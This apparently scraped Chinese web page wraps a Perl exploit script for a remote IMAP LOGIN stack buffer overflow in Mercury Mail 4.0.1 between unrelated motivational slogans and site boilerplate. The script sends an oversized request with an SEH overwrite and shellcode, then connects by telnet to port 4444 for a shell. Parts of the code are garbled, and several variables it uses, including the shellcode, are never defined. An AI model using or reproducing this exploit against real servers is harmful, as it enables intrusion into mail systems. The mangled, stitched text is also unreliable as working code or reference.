如今早已不是大鱼吃小鱼的时代,而是群鱼吃大鱼的年代。一个人永远干不过一个团队!一个人可以走得很快,一群人会走得更远!你能整合别人,说明你有能力;你被别人整合,说明你有价值。在这个年代,你既整合不了别人,也没人整合你,那说明你离成功还有很远。早安,星期四!
#!/usr/bin/perl #
# http://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
send $socket, $request, 0;
print "[ ] Sent 1st request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
my $request ="\x41" x 255;
send $socket, $request, 0;
print "[ ] Sent 2nd request\n";
sleep(1);
my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
send $socket, $request, 0;
print "[ ] Sent final request\n";
sleep(1);
close($socket);
print " connect on port 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
//http://www.leftworld.net
到此这篇关于Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit 就介绍到这了。人生坎坎坷坷,跌跌撞撞那是在所难免。但是,不论跌了多少次,你都要坚强地再次站起来。任何时候,无论你面临着生命的何等困惑,抑或经受着多少挫折,无论道路如何的艰难,无论希望变得如何渺茫,请你不要绝望,再试一次,成功一定属于你!更多相关Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit 内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!